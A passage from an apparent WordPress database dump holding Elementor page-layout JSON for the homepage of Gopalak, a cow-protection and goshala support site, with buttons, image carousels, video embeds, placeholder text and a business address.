pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10123,1696,'_elementor_page_assets','a:0:{}'),(10126,1697,'_elementor_edit_mode','builder'),(10127,1697,'_elementor_template_type','wp-page'),(10128,1697,'_elementor_version','3.7.8'),(10129,1697,'_wp_page_template','elementor_canvas'),(10130,1697,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\"},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\"},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{